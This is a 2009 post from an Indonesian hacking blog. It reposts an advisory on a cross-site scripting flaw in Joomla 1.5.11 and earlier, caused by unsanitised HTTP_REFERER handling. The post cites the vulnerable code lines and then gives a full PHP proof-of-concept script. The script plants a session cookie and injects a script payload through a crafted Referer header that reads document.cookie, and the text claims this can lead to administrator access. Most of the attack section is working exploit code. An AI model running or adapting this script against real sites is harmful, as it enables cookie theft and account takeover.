Sabtu, 2017-11-18, 4:52 PM
Welcome Guest | RSS

SikuruZ Cyber

Site menu

Section categories

Hacking [9]
aLL About hacking
Tutorial [26]
Tutorial
Programing [3]
Programing
Malware [4]
Virus
Puisi dan Sajak [5]
Buatan SikuruZ
Islam [7]
About Islam
Dunia [9]
Dunia Dan Seisi Nya...
Humor... [11]
Cerita Lucu
Sma N 1 LLG [3]
Tugas Dll.

Our poll

Presiden Kalian
Total of answers: 14

Statistics

Main » 2009 » August » 5 » Bug SqL Baru
11:56 AM
Bug SqL Baru
Vulnerable Systems:
 * Joomla! version 1.5.11 and prior

Immune Systems:
 * Joomla! version 1.5.12

HTTP headers are not properly parsed, specifically the HTTP_REFERER variable.
An attacker can exploit the vulnerability to inject DHTML and JavaScript code in the context of the web browser. This may lead theft of the targeted user's cookies and gaining access to the user's account icluding administrator privileges.

Snippet of vulnerable code:

Line 225 of file components/com_content/views/article/tmpl/form.php is vunerable.

221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="article->id; ?>" />
223 <input type="hidden" name="version" value="article->version; ?>" />
224 <input type="hidden" name="created_by" value="article->created_by; ?>" />
225 <input type="hidden" name="referer" value="" />
226
227 <input type="hidden" name="task" value="" />
228 </form>

Other parts of code may be affected:

components/com_user/controller.php:86: $return = @$_SERVER['HTTP_REFERER'];
plugins/system/legacy/html.php:246: echo '<a href="'. $_SERVER['HTTP_REFERER'] .'"><span class="small">'. JText::_( 'BACK' ) .'</span></a>';
templates/beez/html/com_content/article/form.php:186: <input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />


An attacker can redirect the victim to a site with this script and execute javascript code in the victim's browser. The PoC creates a crafted HTTP request with malicious data in the HTTP_REFERER header.
In order to succesfully exploit it, an account with any role is needed. For example, a user with any role can escalate privileges to administrator.
<?php

/* PoC: XSS Joomla 1.5.11
Juan Galiana Lara
Internet Security Auditors
Jun 2009
*/

/* config */
$site='localhost';
$path='/joomla-1.5.11';
$cookname='d85558a8cf943386aaa374896bfd3d99';
$cookvalue='4ab56fdd83bcad86289726aead602699';

class cURL {
var $headers;
var $user_agent;
var $compression;
var $cookie_file;
var $proxy;
/* evil script */
var $xss='alert("PWN PWN PWN: " + document.cookie);';


function
cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {
$this->headers[] = 'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type:
application/x-www-form-urlencoded;charset=UTF-8';
$this->headers[] = 'Referer: "><script>' . $this->xss .'</script><span a="';
$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if ($this->cookies == TRUE) $this->cookie($cookie);
}

function cookie($cookie_file) {
if (file_exists($cookie_file)) {
$this->cookie_file=$cookie_file;
} else {
fopen($cookie_file,'w') or $this->error('The cookie file could not be opened. Check permissions');
$this->cookie_file=$cookie_file;
fclose($this->cookie_file);
}
}

function get($url) {
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEFILE, $this->cookie_file);
if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEJAR, $this->cookie_file);
curl_setopt($process,CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if ($this->proxy) curl_setopt($cUrl, CURLOPT_PROXY, 'proxy_ip:proxy_port');
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
curl_close($process);
return $return;
}

function error($error) {
echo $error;
die;
}
}

/* set cookie */
$f=fopen("cookies.txt","w");
fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n");
fclose($f);

/* do request */
$cc = new cURL();
$c=$cc->get('http://' . $site . $path .
'/index.php?option=com_content&view=article&layout=form');

/* let's execute some javascript.. }:-)*/
echo $c;
?>
Category: Hacking | Views: 700 | Added by: SikuruZ | Rating: 0.0/0
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]

Search

Calendar

«  August 2009  »
SuMoTuWeThFrSa
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Site friends